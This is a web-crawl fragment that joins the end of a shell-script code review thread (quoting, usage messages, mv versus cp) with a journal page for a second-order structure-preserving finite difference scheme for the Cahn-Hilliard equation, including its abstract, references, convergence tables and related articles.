16:24 • I was also wondering about quoting. I've read that I should always quote variable references. Is there a rule of thumb when I have to, and when I don't have to do this? – jacwah Jul 8 '15 at 16:38 • As you and I both suspected, I was wrong. It needs to be *:* to match a : anywhere, see the updated version. I also made other corrections here and there. The rule of thumb about quoting is better safe than sorry. Most of the time quoting does no harm, and not quoting can cause disasters. When in doubt, and you know it causes no harm, then it's a good policy to quote. – janos Jul 8 '15 at 16:45 • ./sab-find-db assumes that sab-find-db exists in your working directory. Why should it? • In the usage-output you should display the program name without path , so die "usage: $(basename$0) .... • Maybe it is more useful if you use different error codes and not only '1'. • A short comment at the beginning of the file about its purpose is useful. • sab-remove does not contain a usage message. • Most users assume that the option '-?' produces a usage message. • It is a good idea to use named variables in the code and not positional parameters. At the top of the function you assign the positional parameters to the named variables. If you change your parameter order or insert/delete new positional parameters you only have to change the first lines of your code. • mvas in mv "$file" target in sab-remove is not a good idea. "$file" replaces target, but not only the content is replaced but also the ownership and the permissions. Do cp "\$file" target instead of mv. • I do not understand the second if-then-else statement in sab-remove. Does this mean you do not want to remove the last entry in the file? • sab-find-db is a name that irritates me. I would prefer something like sab-dbpath. • I think the second if statement in sab-remove was meant to prevent a move if no match was found, but I forgot to remove it after refactoring the code and putting a guard clause at the to. I didn't know about mv vs cp, I'll look into it. – jacwah Jul 8 '15 at 18:36
2020-02-17 11:25:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19691172242164612, "perplexity": 3975.625789335616}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875141806.26/warc/CC-MAIN-20200217085334-20200217115334-00127.warc.gz"}
https://www.aimsciences.org/article/doi/10.3934/cpaa.2021181
# American Institute of Mathematical Sciences February  2022, 21(2): 355-392. doi: 10.3934/cpaa.2021181 ## A second-order accurate structure-preserving scheme for the Cahn-Hilliard equation with a dynamic boundary condition 1 Research Institute for Electronic Science, Hokkaido University, N12W7, Kita-Ward, Sapporo, Hokkaido, 060-0812, Japan 2 Department of Mathematics, Faculty of Education, Kyoto University of Education, 1 Fujinomori, Fukakusa, Fushimi-ku, Kyoto, 612-8522, Japan 3 Cybermedia Center, Osaka University, 1-32 Machikaneyama, Toyonaka, Osaka, 560-0043, Japan 4 Division of Mathematical Sciences, Faculty of Science and Technology, Oita University, 700 Dannoharu, Oita, 870-1192, Japan * Corresponding author Received  February 2021 Revised  September 2021 Published  February 2022 Early access  November 2021 Fund Project: This work was partially supported by JSPS KAKENHI, Grant No. JP20KK0308, JP20K03687, JP20K20883, JP21K03309, JP21K20314, and The Sumitomo Foundation, Grant No. 190367 We propose a structure-preserving finite difference scheme for the Cahn–Hilliard equation with a dynamic boundary condition using the discrete variational derivative method (DVDM) proposed by Furihata and Matsuo [14]. In this approach, it is important and essential how to discretize the energy which characterizes the equation. By modifying the conventional manner and using an appropriate summation-by-parts formula, we can use a standard central difference operator as an approximation of an outward normal derivative on the discrete boundary condition of the scheme. We show that our proposed scheme is second-order accurate in space, although the previous structure-preserving scheme proposed by Fukao–Yoshikawa–Wada [13] is first-order accurate in space. Also, we show the stability, the existence, and the uniqueness of the solution for our proposed scheme. Computation examples demonstrate the effectiveness of our proposed scheme. Especially through computation examples, we confirm that numerical solutions can be stably obtained by our proposed scheme. Citation: Makoto Okumura, Takeshi Fukao, Daisuke Furihata, Shuji Yoshikawa. A second-order accurate structure-preserving scheme for the Cahn-Hilliard equation with a dynamic boundary condition. Communications on Pure and Applied Analysis, 2022, 21 (2) : 355-392. doi: 10.3934/cpaa.2021181 ##### References: [1] J. W. Cahn and J. E. Hilliard, Free energy of a nonuniform system. I. Interfacial free energy, J. Chem. Phys., 28 (1958), 258-267. [2] L. Cherfils and M. Petcu, A numerical analysis of the Cahn–Hilliard equation with non-permeable walls, Numer. Math., 128 (2014), 517-549.  doi: 10.1007/s00211-014-0618-0. [3] L. Cherfils, M. Petcu and M. Pierre, A numerical analysis of the Cahn–Hilliard equation with dynamic boundary conditions, Discrete Contin. Dyn. Syst., 27 (2010), 1511-1533.  doi: 10.3934/dcds.2010.27.1511. [4] L. Cherfils, A. Miranville and S. Zelik, The Cahn–Hilliard equation with logarithmic potentials, Milan J. Math., 79 (2011), 561-596.  doi: 10.1007/s00032-011-0165-4. [5] R. Chill, E. Fašangová and J. Prüss, Convergence to steady states of solutions of the Cahn–Hilliard and Caginalp equations with dynamic boundary conditions, Math. Nachr., 279 (2006), 1448-1462.  doi: 10.1002/mana.200410431. [6] P. Colli and T. Fukao, Cahn–Hilliard equation with dynamic boundary conditions and mass constraint on the boundary, J. Math. Anal. Appl., 429 (2015), 1190-1213.  doi: 10.1016/j.jmaa.2015.04.057. [7] P. Colli, G. Gilardi and J. Sprekels, On the Cahn–Hilliard equation with dynamic boundary conditions and a dominating boundary potential, J. Math. Anal. Appl., 419 (2014), 972-994.  doi: 10.1016/j.jmaa.2014.05.008. [8] P. Colli, G. Gilardi and J. Sprekels, A boundary control problem for the pure Cahn–Hilliard equation with dynamic boundary conditions, Adv. Nonlinear Anal., 4 (2015), 311-325.  doi: 10.1515/anona-2015-0035. [9] P. Colli, G. Gilardi and J. Sprekels, A boundary control problem for the viscous Cahn–Hilliard equation with dynamic boundary conditions, Appl. Math. Optim., 73 (2016), 195-225.  doi: 10.1007/s00245-015-9299-z. [10] Q. Du and R. A. Nicolaides, Numerical analysis of a continuum model of phase transition, SIAM J. Numer. Anal., 28 (1991), 1310-1322.  doi: 10.1137/0728069. [11] C. M. Elliott, The Cahn–Hilliard model for the kinetics of phase separation, in Mathematical Models for Phase Change Problems (ed. J. F. Rodrigues), International Series of Numerical Mathematics, 88, Birkhäuser, 1989. [12] S. M. Fallat and C. R. Johnson, Totally Nonnegative Matrices, Princeton University Press, Princeton, 2011.  doi: 10.1515/9781400839018. [13] T. Fukao, S. Yoshikawa and S. Wada, Structure-preserving finite difference schemes for the Cahn–Hilliard equation with dynamic boundary conditions in the one-dimensional case, Commun. Pure Appl. Anal., 16 (2017), 1915-1938.  doi: 10.3934/cpaa.2017093. [14] D. Furihata and T. Matsuo, Discrete Variational Derivative Method: A Structure-Preserving Numerical Method for Partial Differential Equations, Chapman & Hall/CRC Numerical Analysis and Scientific Computing, CRC Press, Boca Raton, FL, 2011. [15] C. G. Gal, A Cahn–Hilliard model in bounded domains with permeable walls, Math. Methods Appl. Sci., 29 (2006), 2009-2036.  doi: 10.1002/mma.757. [16] G. Gilardi, A. Miranville and G. Schimperna, On the Cahn–Hilliard equation with irregular potentials and dynamic boundary conditions, Commun. Pure Appl. Anal., 8 (2009), 881-912.  doi: 10.3934/cpaa.2009.8.881. [17] G. Gilardi, A. Miranville and G. Schimperna, Long time behavior of the Cahn–Hilliard equation with irregular potentials and dynamic boundary conditions, Chin. Ann. Math., 31 (2010), 679-712.  doi: 10.1007/s11401-010-0602-7. [18] H. Israel, A. Miranville and M. Petcu, Numerical analysis of a Cahn–Hilliard type equation with dynamic boundary conditions, Ricerche Mat., 64 (2015), 25-50.  doi: 10.1007/s11587-014-0187-7. [19] A. Miranville and S. Zelik, Exponential attractors for the Cahn–Hilliard equation with dynamic boundary conditions, Math. Methods Appl. Sci., 28 (2005), 709-735.  doi: 10.1002/mma.590. [20] A. Miranville and S. Zelik, The Cahn–Hilliard equation with singular potentials and dynamic boundary conditions, Discrete Contin. Dyn. Syst., 28 (2010), 275-310.  doi: 10.3934/dcds.2010.28.275. [21] F. Nabet, Convergence of a finite-volume scheme for the Cahn–Hilliard equation with dynamic boundary conditions, IMA J. Numer. Anal., 36 (2016), 1898-1942.  doi: 10.1093/imanum/drv057. [22] F. Nabet, An error estimate for a finite-volume scheme for the Cahn–Hilliard equation with dynamic boundary conditions, Numer. Math., 149 (2021), 185-226. [23] M. Okumura and D. Furihata, A structure-preserving scheme for the Allen-Cahn equation with a dynamic boundary condition, Discrete Contin. Dyn. Syst., 40 (2020), 4927-4960.  doi: 10.3934/dcds.2020206. [24] M. Okumura, T. Fukao, D. Furihata and S. Yoshikawa, Program codes for "A second-order accurate structure-preserving scheme for the Cahn-Hilliard equation with a dynamic boundary condition", Zenodo, https://doi.org/10.5281/zenodo.5541647. [25] J. Prüss, R. Racke and S. Zheng, Maximal regularity and asymptotic behavior of solutions for the Cahn–Hilliard equation with dynamic boundary conditions, Ann. Mat. Pura Appl., 185 (2006), 627-648.  doi: 10.1007/s10231-005-0175-3. [26] R. Racke and S. Zheng, The Cahn–Hilliard equation with dynamic boundary conditions, Adv. Differential Equ., 8 (2003), 83-110. [27] H. Wu and S. Zheng, Convergence to equilibrium for the Cahn–Hilliard equation with dynamic boundary conditions, J. Differential Equations, 204 (2004), 511-531.  doi: 10.1016/j.jde.2004.05.004. [28] K. Yano and S. Yoshikawa, Structure-preserving finite difference schemes for a semilinear thermoelastic system with second order time derivative, Jpn. J. Ind. Appl. Math., 35 (2018), 1213-1244.  doi: 10.1007/s13160-018-0332-x. [29] S. Yoshikawa, An error estimate for structure-preserving finite difference scheme for the Falk model system of shape memory alloys, IMA J. Numer. Anal., 37 (2017), 477-504.  doi: 10.1093/imanum/drv072. [30] S. Yoshikawa, Energy method for structure-preserving finite difference schemes and some properties of difference quotient, J. Comput. Appl. Math., 311 (2017), 394-413.  doi: 10.1016/j.cam.2016.08.008. [31] S. Yoshikawa, Remarks on energy methods for structure-preserving finite difference schemes–Small data global existence and unconditional error estimate, Appl. Math. Comput., 341 (2019), 80-92.  doi: 10.1016/j.amc.2018.08.030. show all references ##### References: [1] J. W. Cahn and J. E. Hilliard, Free energy of a nonuniform system. I. Interfacial free energy, J. Chem. Phys., 28 (1958), 258-267. [2] L. Cherfils and M. Petcu, A numerical analysis of the Cahn–Hilliard equation with non-permeable walls, Numer. Math., 128 (2014), 517-549.  doi: 10.1007/s00211-014-0618-0. [3] L. Cherfils, M. Petcu and M. Pierre, A numerical analysis of the Cahn–Hilliard equation with dynamic boundary conditions, Discrete Contin. Dyn. Syst., 27 (2010), 1511-1533.  doi: 10.3934/dcds.2010.27.1511. [4] L. Cherfils, A. Miranville and S. Zelik, The Cahn–Hilliard equation with logarithmic potentials, Milan J. Math., 79 (2011), 561-596.  doi: 10.1007/s00032-011-0165-4. [5] R. Chill, E. Fašangová and J. Prüss, Convergence to steady states of solutions of the Cahn–Hilliard and Caginalp equations with dynamic boundary conditions, Math. Nachr., 279 (2006), 1448-1462.  doi: 10.1002/mana.200410431. [6] P. Colli and T. Fukao, Cahn–Hilliard equation with dynamic boundary conditions and mass constraint on the boundary, J. Math. Anal. Appl., 429 (2015), 1190-1213.  doi: 10.1016/j.jmaa.2015.04.057. [7] P. Colli, G. Gilardi and J. Sprekels, On the Cahn–Hilliard equation with dynamic boundary conditions and a dominating boundary potential, J. Math. Anal. Appl., 419 (2014), 972-994.  doi: 10.1016/j.jmaa.2014.05.008. [8] P. Colli, G. Gilardi and J. Sprekels, A boundary control problem for the pure Cahn–Hilliard equation with dynamic boundary conditions, Adv. Nonlinear Anal., 4 (2015), 311-325.  doi: 10.1515/anona-2015-0035. [9] P. Colli, G. Gilardi and J. Sprekels, A boundary control problem for the viscous Cahn–Hilliard equation with dynamic boundary conditions, Appl. Math. Optim., 73 (2016), 195-225.  doi: 10.1007/s00245-015-9299-z. [10] Q. Du and R. A. Nicolaides, Numerical analysis of a continuum model of phase transition, SIAM J. Numer. Anal., 28 (1991), 1310-1322.  doi: 10.1137/0728069. [11] C. M. Elliott, The Cahn–Hilliard model for the kinetics of phase separation, in Mathematical Models for Phase Change Problems (ed. J. F. Rodrigues), International Series of Numerical Mathematics, 88, Birkhäuser, 1989. [12] S. M. Fallat and C. R. Johnson, Totally Nonnegative Matrices, Princeton University Press, Princeton, 2011.  doi: 10.1515/9781400839018. [13] T. Fukao, S. Yoshikawa and S. Wada, Structure-preserving finite difference schemes for the Cahn–Hilliard equation with dynamic boundary conditions in the one-dimensional case, Commun. Pure Appl. Anal., 16 (2017), 1915-1938.  doi: 10.3934/cpaa.2017093. [14] D. Furihata and T. Matsuo, Discrete Variational Derivative Method: A Structure-Preserving Numerical Method for Partial Differential Equations, Chapman & Hall/CRC Numerical Analysis and Scientific Computing, CRC Press, Boca Raton, FL, 2011. [15] C. G. Gal, A Cahn–Hilliard model in bounded domains with permeable walls, Math. Methods Appl. Sci., 29 (2006), 2009-2036.  doi: 10.1002/mma.757. [16] G. Gilardi, A. Miranville and G. Schimperna, On the Cahn–Hilliard equation with irregular potentials and dynamic boundary conditions, Commun. Pure Appl. Anal., 8 (2009), 881-912.  doi: 10.3934/cpaa.2009.8.881. [17] G. Gilardi, A. Miranville and G. Schimperna, Long time behavior of the Cahn–Hilliard equation with irregular potentials and dynamic boundary conditions, Chin. Ann. Math., 31 (2010), 679-712.  doi: 10.1007/s11401-010-0602-7. [18] H. Israel, A. Miranville and M. Petcu, Numerical analysis of a Cahn–Hilliard type equation with dynamic boundary conditions, Ricerche Mat., 64 (2015), 25-50.  doi: 10.1007/s11587-014-0187-7. [19] A. Miranville and S. Zelik, Exponential attractors for the Cahn–Hilliard equation with dynamic boundary conditions, Math. Methods Appl. Sci., 28 (2005), 709-735.  doi: 10.1002/mma.590. [20] A. Miranville and S. Zelik, The Cahn–Hilliard equation with singular potentials and dynamic boundary conditions, Discrete Contin. Dyn. Syst., 28 (2010), 275-310.  doi: 10.3934/dcds.2010.28.275. [21] F. Nabet, Convergence of a finite-volume scheme for the Cahn–Hilliard equation with dynamic boundary conditions, IMA J. Numer. Anal., 36 (2016), 1898-1942.  doi: 10.1093/imanum/drv057. [22] F. Nabet, An error estimate for a finite-volume scheme for the Cahn–Hilliard equation with dynamic boundary conditions, Numer. Math., 149 (2021), 185-226. [23] M. Okumura and D. Furihata, A structure-preserving scheme for the Allen-Cahn equation with a dynamic boundary condition, Discrete Contin. Dyn. Syst., 40 (2020), 4927-4960.  doi: 10.3934/dcds.2020206. [24] M. Okumura, T. Fukao, D. Furihata and S. Yoshikawa, Program codes for "A second-order accurate structure-preserving scheme for the Cahn-Hilliard equation with a dynamic boundary condition", Zenodo, https://doi.org/10.5281/zenodo.5541647. [25] J. Prüss, R. Racke and S. Zheng, Maximal regularity and asymptotic behavior of solutions for the Cahn–Hilliard equation with dynamic boundary conditions, Ann. Mat. Pura Appl., 185 (2006), 627-648.  doi: 10.1007/s10231-005-0175-3. [26] R. Racke and S. Zheng, The Cahn–Hilliard equation with dynamic boundary conditions, Adv. Differential Equ., 8 (2003), 83-110. [27] H. Wu and S. Zheng, Convergence to equilibrium for the Cahn–Hilliard equation with dynamic boundary conditions, J. Differential Equations, 204 (2004), 511-531.  doi: 10.1016/j.jde.2004.05.004. [28] K. Yano and S. Yoshikawa, Structure-preserving finite difference schemes for a semilinear thermoelastic system with second order time derivative, Jpn. J. Ind. Appl. Math., 35 (2018), 1213-1244.  doi: 10.1007/s13160-018-0332-x. [29] S. Yoshikawa, An error estimate for structure-preserving finite difference scheme for the Falk model system of shape memory alloys, IMA J. Numer. Anal., 37 (2017), 477-504.  doi: 10.1093/imanum/drv072. [30] S. Yoshikawa, Energy method for structure-preserving finite difference schemes and some properties of difference quotient, J. Comput. Appl. Math., 311 (2017), 394-413.  doi: 10.1016/j.cam.2016.08.008. [31] S. Yoshikawa, Remarks on energy methods for structure-preserving finite difference schemes–Small data global existence and unconditional error estimate, Appl. Math. Comput., 341 (2019), 80-92.  doi: 10.1016/j.amc.2018.08.030. Numerical solution by our scheme with $\Delta x = 1/2$ Numerical solution by Fukao-Yoshikawa-Wada scheme with $\Delta x = 1/2$ Numerical solution by our scheme with $\Delta x = 1/40$ Numerical solution by Fukao-Yoshikawa-Wada scheme with $\Delta x = 1/40$ Time development of $M_{\rm d}(\boldsymbol{U}^{(n)})$ obtained by our scheme with $\Delta x = 1/40$: $M_{\rm d}(\boldsymbol{U}^{(n)})$ is preserved to accuracy $10^{-11}$ Time development of $E_{\rm d}^{(n)} - J_{\rm d}(\boldsymbol{U}^{(0)})$ obtained by our scheme with $\Delta x = 1/40$: $E_{\rm d}^{(n)}$ is preserved to accuracy $10^{-6}$ The discrete $L^{\infty}$-norm error $\|\boldsymbol{e}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ versus the space mesh size $\Delta x$ at time $T = 400$: our scheme is second-order accurate in space The discrete $L^{\infty}$-norm error $\|\boldsymbol{e}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ versus the time mesh size $\Delta t$ at time $T = 400$: our scheme is second-order accurate in time Numerical solution by our scheme with $\Delta x = 1/25$ Numerical solution by Fukao-Yoshikawa-Wada scheme with $\Delta x = 1/25$ Numerical solution by our scheme with $\Delta x = 1/50$ Numerical solution by Fukao-Yoshikawa-Wada scheme with $\Delta x = 1/50$ Time development of ${M_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(n)}})$ obtained by our scheme with $\Delta x = 1/50$: ${M_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(n)}})$ is preserved to accuracy 10−14 Time development of $E_{\rm{d}}^{(n)} - {J_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(0)}})$ obtained by our scheme with $\Delta x = 1/50$: $E_{\rm{d}}^{(n)}$ is preserved to accuracy 10−11 The discrete L-norm error ${\left\| {{\mathit{\boldsymbol{e}}_{\Delta x}}} \right\|_{L_{\rm{d}}^\infty }}$ versus the space mesh size Δx at time T = 1000: our scheme is second-order accurate in space The discrete L-norm error ${\left\| {{\mathit{\boldsymbol{e}}_{\Delta t}}} \right\|_{L_{\rm{d}}^\infty }}$ versus the time mesh size Δt at time T = 1000: the convergence rates of our scheme approach three as Δt decreases Numerical solution to (1.1)–(1.2) with (1.5) and (6.1) obtained by our scheme Time development of ${M_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(n)}})$ obtained by our scheme: ${M_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(n)}})$ is preserved to accuracy 10−11 Time development of $E_{_{\rm{d}}}^{(n)} - {J_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(0)}})$ obtained by our scheme: $E_{_{\rm{d}}}^{(n)}$ is preserved to accuracy 10−10 Numerical solution to (1.1)–(1.2) with (7.16) obtained by the discrete variational derivative scheme Time development of ${M_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(n)}})$ obtained by the discrete variational derivative scheme: ${M_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(n)}})$ is preserved to accuracy 10−14 Time development of $A_{_{\rm{d}}}^{(n)} - {{\bar J}_{\rm{d}}}({\mathit{\boldsymbol{U}}^{(0)}})$ obtained by the discrete variational derivative scheme: $A_{_{\rm{d}}}^{(n)}$ is preserved to accuracy 10−9 The discrete $L^{\infty}$-norm error $\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ and the convergence rates $\log_{2}(\|\mathit{\boldsymbol{e}}_{2\Delta x} \|_{L_{\rm d}^{\infty}}/\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}})$ at time $T = 400$ $\Delta x$ $2^{-1}$ $2^{-2}$ $2^{-3}$ $2^{-4}$ $\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ 3.5272e-3 8.6474e-4 2.1507e-4 5.1156e-5 Rate / 2.0282 2.0075 2.0718 $\Delta x$ $2^{-1}$ $2^{-2}$ $2^{-3}$ $2^{-4}$ $\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ 3.5272e-3 8.6474e-4 2.1507e-4 5.1156e-5 Rate / 2.0282 2.0075 2.0718 The discrete $L^{\infty}$-norm error $\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ and the convergence rates $\log_{2}(\|\mathit{\boldsymbol{e}}_{2\Delta t} \|_{L_{\rm d}^{\infty}}/\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}})$ at time $T = 400$ $\Delta t$ $2^{-1}$ $2^{-2}$ $2^{-3}$ $2^{-4}$ $\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ 2.2345e-6 5.6404e-7 1.4274e-7 3.4246e-8 Rate / 1.9861 1.9824 2.0594 $\Delta t$ $2^{-1}$ $2^{-2}$ $2^{-3}$ $2^{-4}$ $\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ 2.2345e-6 5.6404e-7 1.4274e-7 3.4246e-8 Rate / 1.9861 1.9824 2.0594 The discrete $L^{\infty}$-norm error $\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ and the convergence rates $\log_{2}(\|\mathit{\boldsymbol{e}}_{2\Delta x} \|_{L_{\rm d}^{\infty}}/\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}})$ at time $T = 1000$ $\Delta x$ $2^{-2}$ $2^{-3}$ $2^{-4}$ $2^{-5}$ $\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ 1.7727e-3 4.3813e-4 1.0850e-4 2.5856e-5 Rate / 2.0165 2.0137 2.0691 $\Delta x$ $2^{-2}$ $2^{-3}$ $2^{-4}$ $2^{-5}$ $\|\mathit{\boldsymbol{e}}_{\Delta x} \|_{L_{\rm d}^{\infty}}$ 1.7727e-3 4.3813e-4 1.0850e-4 2.5856e-5 Rate / 2.0165 2.0137 2.0691 The discrete $L^{\infty}$-norm error $\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ and the convergence rates $\log_{2}(\|\mathit{\boldsymbol{e}}_{2\Delta t} \|_{L_{\rm d}^{\infty}}/\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}})$ at time $T = 1000$ $\Delta t$ $1/10$ $1/20$ $1/40$ $1/80$ $\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ 1.2473e-3 4.3482e-4 5.1131e-5 5.2106e-6 Rate / 1.5203 3.0881 3.2947 $\Delta t$ $1/10$ $1/20$ $1/40$ $1/80$ $\|\mathit{\boldsymbol{e}}_{\Delta t} \|_{L_{\rm d}^{\infty}}$ 1.2473e-3 4.3482e-4 5.1131e-5 5.2106e-6 Rate / 1.5203 3.0881 3.2947 [1] Makoto Okumura, Daisuke Furihata. A structure-preserving scheme for the Allen–Cahn equation with a dynamic boundary condition. Discrete and Continuous Dynamical Systems, 2020, 40 (8) : 4927-4960. doi: 10.3934/dcds.2020206 [2] Takeshi Fukao, Shuji Yoshikawa, Saori Wada. Structure-preserving finite difference schemes for the Cahn-Hilliard equation with dynamic boundary conditions in the one-dimensional case. Communications on Pure and Applied Analysis, 2017, 16 (5) : 1915-1938. doi: 10.3934/cpaa.2017093 [3] Tetsuya Ishiwata, Kota Kumazaki. Structure preserving finite difference scheme for the Landau-Lifshitz equation with applied magnetic field. Conference Publications, 2015, 2015 (special) : 644-651. doi: 10.3934/proc.2015.0644 [4] Qi Hong, Jialing Wang, Yuezheng Gong. Second-order linear structure-preserving modified finite volume schemes for the regularized long wave equation. Discrete and Continuous Dynamical Systems - B, 2019, 24 (12) : 6445-6464. doi: 10.3934/dcdsb.2019146 [5] Sergey P. Degtyarev. On Fourier multipliers in function spaces with partial Hölder condition and their application to the linearized Cahn-Hilliard equation with dynamic boundary conditions. Evolution Equations and Control Theory, 2015, 4 (4) : 391-429. doi: 10.3934/eect.2015.4.391 [6] Yuto Miyatake, Tai Nakagawa, Tomohiro Sogabe, Shao-Liang Zhang. A structure-preserving Fourier pseudo-spectral linearly implicit scheme for the space-fractional nonlinear Schrödinger equation. Journal of Computational Dynamics, 2019, 6 (2) : 361-383. doi: 10.3934/jcd.2019018 [7] Alain Miranville, Sergey Zelik. The Cahn-Hilliard equation with singular potentials and dynamic boundary conditions. Discrete and Continuous Dynamical Systems, 2010, 28 (1) : 275-310. doi: 10.3934/dcds.2010.28.275 [8] Laurence Cherfils, Madalina Petcu, Morgan Pierre. A numerical analysis of the Cahn-Hilliard equation with dynamic boundary conditions. Discrete and Continuous Dynamical Systems, 2010, 27 (4) : 1511-1533. doi: 10.3934/dcds.2010.27.1511 [9] Gianni Gilardi, A. Miranville, Giulio Schimperna. On the Cahn-Hilliard equation with irregular potentials and dynamic boundary conditions. Communications on Pure and Applied Analysis, 2009, 8 (3) : 881-912. doi: 10.3934/cpaa.2009.8.881 [10] Cecilia Cavaterra, Maurizio Grasselli, Hao Wu. Non-isothermal viscous Cahn-Hilliard equation with inertial term and dynamic boundary conditions. Communications on Pure and Applied Analysis, 2014, 13 (5) : 1855-1890. doi: 10.3934/cpaa.2014.13.1855 [11] Yones Esmaeelzade Aghdam, Hamid Safdari, Yaqub Azari, Hossein Jafari, Dumitru Baleanu. Numerical investigation of space fractional order diffusion equation by the Chebyshev collocation method of the fourth kind and compact finite difference scheme. Discrete and Continuous Dynamical Systems - S, 2021, 14 (7) : 2025-2039. doi: 10.3934/dcdss.2020402 [12] Gisèle Ruiz Goldstein, Alain Miranville. A Cahn-Hilliard-Gurtin model with dynamic boundary conditions. Discrete and Continuous Dynamical Systems - S, 2013, 6 (2) : 387-400. doi: 10.3934/dcdss.2013.6.387 [13] Laurence Cherfils, Madalina Petcu. On the viscous Cahn-Hilliard-Navier-Stokes equations with dynamic boundary conditions. Communications on Pure and Applied Analysis, 2016, 15 (4) : 1419-1449. doi: 10.3934/cpaa.2016.15.1419 [14] Vladislav Balashov, Alexander Zlotnik. An energy dissipative semi-discrete finite-difference method on staggered meshes for the 3D compressible isothermal Navier–Stokes–Cahn–Hilliard equations. Journal of Computational Dynamics, 2020, 7 (2) : 291-312. doi: 10.3934/jcd.2020012 [15] Xiaoqiang Dai, Chao Yang, Shaobin Huang, Tao Yu, Yuanran Zhu. Finite time blow-up for a wave equation with dynamic boundary condition at critical and high energy levels in control systems. Electronic Research Archive, 2020, 28 (1) : 91-102. doi: 10.3934/era.2020006 [16] Adrian Viorel, Cristian D. Alecsa, Titus O. Pinţa. Asymptotic analysis of a structure-preserving integrator for damped Hamiltonian systems. Discrete and Continuous Dynamical Systems, 2021, 41 (7) : 3319-3341. doi: 10.3934/dcds.2020407 [17] Shenglan Xie, Maoan Han, Peng Zhu. A posteriori error estimate of weak Galerkin fem for second order elliptic problem with mixed boundary condition. Discrete and Continuous Dynamical Systems - B, 2021, 26 (10) : 5217-5226. doi: 10.3934/dcdsb.2020340 [18] Jaemin Shin, Yongho Choi, Junseok Kim. An unconditionally stable numerical method for the viscous Cahn--Hilliard equation. Discrete and Continuous Dynamical Systems - B, 2014, 19 (6) : 1737-1747. doi: 10.3934/dcdsb.2014.19.1737 [19] Andreas C. Aristotelous, Ohannes Karakashian, Steven M. Wise. A mixed discontinuous Galerkin, convex splitting scheme for a modified Cahn-Hilliard equation and an efficient nonlinear multigrid solver. Discrete and Continuous Dynamical Systems - B, 2013, 18 (9) : 2211-2238. doi: 10.3934/dcdsb.2013.18.2211 [20] Ciprian G. Gal, Alain Miranville. Robust exponential attractors and convergence to equilibria for non-isothermal Cahn-Hilliard equations with dynamic boundary conditions. Discrete and Continuous Dynamical Systems - S, 2009, 2 (1) : 113-147. doi: 10.3934/dcdss.2009.2.113 2021 Impact Factor: 1.273
2022-09-26 06:44:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4848306179046631, "perplexity": 1938.742255068788}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00603.warc.gz"}
https://staging.coursekata.org/preview/book/d10dd3be-dbef-476d-bc6a-f9e3bd9d2852/lesson/17/1
